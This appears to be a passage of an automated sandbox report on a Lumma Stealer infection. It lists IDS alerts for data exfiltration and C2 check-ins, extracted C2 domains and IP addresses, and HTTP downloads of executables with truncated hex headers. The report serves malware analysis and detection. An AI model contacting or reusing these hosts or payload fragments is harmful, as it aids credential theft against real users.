Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50252 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50292 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50296 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50297 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50264 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50294 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50273 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50316 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50324 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50313 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: l.exe.23.dr
Source: global traffic TCP traffic: 192.168.2.5:50312 -> 5.79.74.169:12000
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 